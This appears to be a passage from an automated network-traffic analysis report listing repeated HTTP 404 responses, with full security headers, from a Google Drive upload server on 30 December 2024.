                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC54KiVpcBu2nY65JLIaFtSEo6_qKzKFnfwMGWpZeZtP6dDcTNlU6k5W4-D70jCtlbz37ge_EasContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:36 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-l5sNE6-RkMlz5NugYVCoTg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7tFm43SHQ8M_hkHIYNGOOkx9yROYvcLACVCTuKJlD5JTkymPyBpeH6z8Rzhb1RFr1kTBVgsUIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:37 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-Px0bYMPCmrCj2T7PnXR1Jg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5YPc1ULt8QZ-Us8tJ_EIOQD20fJ2C6WMFqK58Gcy3JtlPGbuOb1jjVKUFMKlVynchRContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:37 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-edkOwu2j-iEUONHPmvuOiA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7KspgTarYC98GTxCEEfemMoteZyUovq4tHirlllT1B9zoR1H8Kp42fGTIvxRwih4q6Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:41 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-bLwLag8mvozZL2YTB9cKQQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4hf7sEeORlDyKXjBCDsncCiep8fhwQ_sk3_g3Pm679hxvUW0SELRocx8_RbYk79zJSContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:41 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-V7GlkiGI3o_Kb5cmwLQ_OQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6cXagbHJkGnYe61YgkcEAzrj60IfJm3lpPnYIfH262dnPF9dkFFSsLdceFM_AN0DriTvcw0hkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:42 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-tVAKuSPDVFGiQ8-CkEhiPQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7_S5M_jRT_ho84kNefIPTdX51o5Lsfqgx2nAx8ofb92AXhaROX4z_Y1T6mi1f-b3j2Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:42 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-lsN1IenBPG81XtBuWg7zJQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4xGQxMnFAbP_YUDNtRyOkD9FEuCQzll9IT4QbfLROe73IBhdlCY8botG7vx1-rFkzXLTcEkBgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:43 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Dk3WDjvaYlQ1PqTE0gGqSA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4b64374eGQxD2SfvLPd_qNN54rj6FJysXUKR7Ntqv9wppbpiZuExQmpZf88ardkla3Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:43 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-laTNPNx4Ec8EmOBqWuoUHw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC569B1XNmoQykBBpUly-xZbI5bAdpsvBpv6PgUWT2ycaF0Q5ES2QxAaK7gzRT0uy8LCContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:45 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-2JlnM_k27-4eIZlmvEu4jQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6uQbRvQ_mArwzefTphklp4EikxjvR0vxCd2mY3cSX6sabwbDpr0YLTXuj4VffFgxhIgH71ZtkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:45 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-uicQ30HIpBqie7gxRO_Qpg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6PbHKft8ZQ3k_t87-dXBjrDxPHqOcxrAooUmNxwKYel9IiuUJQxKxs_5NMWq-ytNB1cEwBIvYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:46 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-tTTDHQtVr1To0zHywZeH6Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7aibd1GG2-QVA15KhQXj5amG22_Aa0pWjmIBuxMDtRiHXSjJQsnVy-mWombofuSp6nContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:46 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-xSC4nDxN4HrGtznMxYs81w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5hkd2Ng6rGBPeBe76WDZHUbVbqN1mKgjKbNlTlOLEt_Qza5EDfYxFmz0UggB3Kn0mwO7I-0RMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:47 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-49_Q46qm5ZCeUKK2mSlQyg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6ge6UBvu9uZiZtdxmI0-pNOO5HjFXlfEMJrSSmSIflKgJBAcqVwocIJKE61nno-c_UUtT2YggContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:49 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-dBZO0BNDW_1v7pqPQxbUGQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6lTGIW5_v_Ad-GPfsTluD8HOmb7ZQvVwDDb_wkXivZ3IlM6PwMNeX0L9IwVtXWPzFHContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:49 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-jH3QNddspFNMkjNbVxAx7g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7RsI4IkVDAWhw9X3YB-4sRiYsdjXMJMC-WUbQI93dliba3ysV-qYaK5pyfAwJls7fRContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:50 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-DGA-k_GhwQlVtb6IjSbW0w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6aX6ttD9KgBWR3kvDukDEJUG10DMgvxXnC7F9wdoo3yacrFa7RNiFqZ1Tvj2CzdeUKContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:50 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-4OTMKfTK9Z79lD8xm8TWlg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7yaUzypYSlbbFQXaGO7KHVbJCwY9dk8ldLNJI01K7aekDcmuxHMBXpm7N7xS2QtSE6Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:51 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-EfXjMlrs8_4GcByW26NkzA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7_vG-PVVg6uyGJnjynI36DBJN9jcgyProE1YcNDeSF6WAbQzcIiP0_mBEGoAmwnWiaContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:52 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-z_KGyLs1Yl5PDil5ezNwcQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
